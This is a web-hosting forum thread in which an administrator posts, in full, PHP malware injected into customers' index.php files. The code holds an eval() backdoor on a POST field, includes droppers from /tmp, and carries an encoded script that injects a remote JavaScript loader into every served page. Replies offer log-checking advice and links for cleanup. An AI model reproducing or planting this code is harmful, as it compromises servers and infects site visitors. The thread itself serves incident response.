gertiebeth (Well-Known Member, joined Jun 4, 2003, Minnesota, USA; cPanel Access Level: Root Administrator)
I currently run 22 Linux servers using cPanel with heavy mod_security rules and a firewall. PHP has been hardened and many other security measures are in place. Right now I have 3 different people that I host who are suffering from PHP include hacks. It is only 3 people and their sites are hosted on several different servers. No one else is having a problem, which leads me to believe this is a problem with the user's PC. But for the life of me I cannot find out how to help them! I have tried Google, but I'm not quite sure what to search for. Here is an example of the malicious code that is being inserted into their index.php, admin.php and other files:

Code:
<?php
if (!function_exists('tmp_lkojfghx')) {
    // Stage loader: include the first dropper found at /tmp/m1 .. /tmp/m9.
    for ($i = 1; $i < 10; $i++)
        if (is_file($f = '/tmp/m' . $i)) { include_once($f); break; }
    // Backdoor: any POST field named tmp_lkojfghx3 is eval()'d as PHP.
    if (isset($_POST['tmp_lkojfghx3']))
        eval($_POST['tmp_lkojfghx3']);
    // Payload: base64 of an obfuscated <script> block that document.write()s
    // a <script src=...> tag pointing at a remote host.
    if (!defined('TMP_XHGFJOKL'))
        define('TMP_XHGFJOKL', base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdwR3YlM0NwR3Zzczd4Y3JpcEd2cHQlMjBod3pzcmMzZ0QlM0QlMkZod3olMkY3OCUyRVo3WjExMFo3WiUyRTE3T281R0Q4JTJFMjRIYjlPbyUyRmpPb3F1ZXJHRDh5JTJFSGJqc0dEOCUzRVo3WiUzQzNnRCUyRnNjWjdack9vaWh3enB0JTNFJykucmVwbGFjZSgvSGJ8T298b0t8cEd2fEdEOHwzZ0R8czd4fFo3Wnxod3ovZywiIikpOwogLS0+PC9zY3JpcHQ+'));
    // Output-buffer callback: rewrites every page the server sends out.
    function tmp_lkojfghx($s) {
        // Transparently handle gzip-compressed output (1f8b magic).
        if ($g = (bin2hex(substr($s, 0, 2)) == '1f8b'))
            $s = gzinflate(substr($s, 10, -8));
        // Strip other obfuscated <script> blocks (long eval/fromCharCode or
        // document.write payloads) so that only this payload remains.
        if (preg_match_all('#<script(.*?)</script>#is', $s, $a))
            foreach ($a[0] as $v)
                if (count(explode("\n", $v)) > 5) {
                    $e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v)
                      || preg_match('#[\(\[](\s*\d+,){20,}#', $v);
                    if ((preg_match('#\beval\b#', $v) && ($e || strpos($v, 'fromCharCode')))
                        || ($e && strpos($v, 'document.write')))
                        $s = str_replace($v, '', $s);
                }
        // Remove any earlier copy of its own payload, then re-insert it before
        // <body>; otherwise, if a copy was removed or the output looks like
        // HTML (</body> or </title> present), append it at the end.
        $s1 = preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#', '', $s);
        if (stristr($s, '<body'))
            $s = preg_replace('#(\s*<body)#mi', TMP_XHGFJOKL . '\1', $s1);
        elseif (($s1 != $s) || stristr($s, '</body') || stristr($s, '</title>'))
            $s = $s1 . TMP_XHGFJOKL;
        return $g ? gzencode($s) : $s;
    }
    // Installed as the PHP error handler, so it re-runs on every notice or
    // warning: unwinds the existing output buffers and restacks them under
    // the tmp_lkojfghx filter.
    function tmp_lkojfghx2($a = 0, $b = 0, $c = 0, $d = 0) {
        $s = array();
        // Chain to the site's original error handler, if one was saved.
        if ($b && $GLOBALS['tmp_xhgfjokl'])
            call_user_func($GLOBALS['tmp_xhgfjokl'], $a, $b, $c, $d);
        foreach (@ob_get_status(1) as $v)
            if (($a = $v['name']) == 'tmp_lkojfghx') return;
            else $s[] = array($a == 'default output handler' ? false : $a);
        for ($i = count($s) - 1; $i >= 0; $i--) {
            $s[$i][1] = ob_get_contents();
            ob_end_clean();
        }
        ob_start('tmp_lkojfghx');
        for ($i = 0; $i < count($s); $i++) {
            ob_start($s[$i][0]);
            echo $s[$i][1];
        }
    }
}
// Hook in: register tmp_lkojfghx2 as error handler (saving the previous one)
// and start the output filter right away.
if (($a = @set_error_handler('tmp_lkojfghx2')) != 'tmp_lkojfghx2')
    $GLOBALS['tmp_xhgfjokl'] = $a;
tmp_lkojfghx2();
?>
Does anyone recognize this? All I've been able to find is problems back in 2008 with IX webhosting, which I have no affiliation with. All of my servers are managed by me from SoftLayer.

Any help?
 

LiNUxG0d (Well-Known Member, joined Jun 25, 2003, Gatineau, Quebec, Canada)
Typical source injections...

The common things you can look at, on the server side, are these:

- Locate references to .txt in a users domlogs (in the URI portion of accesses), to see if they logged in using a PHP include... there shouldn't be any if you run mod_sec heavily, but there might... :P

- Check the /var/log/messages to see if the hackers have privs by password that the user may not be aware of.

- Do the same, but for /usr/local/cpanel/logs/access_log (grep the user's username and sift through the IPs for oddballs)

Are you locking down php.ini at all? (disable_functions)

If the user has a cPanel with reseller privs, then you may need to reset their WHM password, as it may be compromised.

Realistically, if it's 3 or so sites, I would think it's a keylogger on their home PC. If it's 3 or so SERVERS with 100+ accounts or something to that effect, I would think it may be rooted, depending on what's installed on it and how old your kernel is.

There are - really - many many many guesstimatable factors in your equation... if there are no logs to prove intrusion, then I would suspect that the issue is more serious than you may think.

Never take it lightly. I'm sure you don't. :)
 
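The three server-side log checks in the reply above, as an added example that is not part of the reply or of cPanel's tooling: shell functions that pull .txt references out of a domlog's URI field, list the source IPs that used a given cPanel account, and report the ones missing from an allowlist. The domlog lines follow the Apache combined format cPanel writes per domain; the cPanel access_log lines, the account name customer, the addresses and the allowlist file are constructed for the demo, and the assumption that the authenticated username sits in field 3 of access_log comes from that constructed sample, so check it against a real line before relying on it.

```shell
#!/bin/sh
# Added example, not code from the thread: the three log checks from the
# reply above, run over constructed log lines. The domlog lines use the
# Apache combined format cPanel writes per domain; the cPanel access_log
# lines, the account name "customer", the IPs and the allowlist are
# assumptions made for this demo, and the awk field numbers follow them.

# Requests whose URI references a .txt file, the usual shape of a remote
# file include attempt (?page=http://host/shell.txt). Prints "ip uri".
rfi_hits() {
    awk '$7 ~ /\.txt/ { print $1, $7 }' "$1"
}

# Every source IP that used the given cPanel account, busiest first, as
# "ip count". Field 3 is taken to be the authenticated username.
login_ips() {
    awk -v u="$2" '$3 == u { print $1 }' "$1" | sort | uniq -c | sort -rn \
        | awk '{ print $2, $1 }'
}

# IPs from login_ips that are absent from an allowlist file (one IP per
# line): the "oddballs" to raise with the customer.
odd_ips() {
    login_ips "$1" "$2" | awk '{ print $1 }' | grep -vxFf "$3"
    return 0
}

# Constructed samples: 203.0.113.7 probes the site with an RFI-style URL
# and later uses the customer's cPanel login from the same address, while
# 198.51.100.12 is the customer's usual (allowlisted) address.
make_sample_logs() {
    mkdir -p "$1"
    cat > "$1/domlog" <<'EOF'
198.51.100.12 - - [10/Jun/2009:09:01:05 -0500] "GET /index.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2009:03:14:22 -0500] "GET /index.php?page=http://203.0.113.99/cmd.txt? HTTP/1.1" 200 3421 "-" "Mozilla/4.0"
198.51.100.12 - - [10/Jun/2009:09:02:11 -0500] "GET /about.php HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
EOF
    cat > "$1/cpanel_access_log" <<'EOF'
198.51.100.12 - customer [10/Jun/2009:08:55:10 -0500] "GET /frontend/x3/index.html HTTP/1.1" 200 15211 "-" "Mozilla/5.0"
203.0.113.7 - customer [10/Jun/2009:03:12:51 -0500] "POST /login/ HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - customer [10/Jun/2009:03:13:02 -0500] "GET /frontend/x3/files/index.html HTTP/1.1" 200 9800 "-" "Mozilla/4.0"
198.51.100.12 - other [10/Jun/2009:10:00:00 -0500] "GET /frontend/x3/index.html HTTP/1.1" 200 15211 "-" "Mozilla/5.0"
EOF
    printf '198.51.100.12\n' > "$1/known_ips"
}

# Demo run against the constructed logs.
demo_dir=$(mktemp -d)
make_sample_logs "$demo_dir"
echo "RFI-style requests:";        rfi_hits "$demo_dir/domlog"
echo "cPanel logins for customer:"; login_ips "$demo_dir/cpanel_access_log" customer
echo "not on the allowlist:";       odd_ips "$demo_dir/cpanel_access_log" customer "$demo_dir/known_ips"
rm -rf "$demo_dir"
```

On a live box point rfi_hits at /usr/local/apache/domlogs/<domain> for each affected site and login_ips at /usr/local/cpanel/logs/access_log; an address that shows up in both outputs, as 203.0.113.7 does in the demo, is the one to correlate with file modification times on the injected scripts.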

AndyReed (Well-Known Member, PartnerNOC, joined May 29, 2004, Minneapolis, MN)
Quote (gertiebeth): Here is an example of the malicious code that is being inserted into their index.php, admin.php and other files: [the code sample from the first post]
There are several threads that discussed the iframe injection problem. Check out these threads:
http://forums.cpanel.net/showthread.php?t=62821
http://forums.cpanel.net/showthread.php?t=78595
http://forums.cpanel.net/showthread.php?t=78084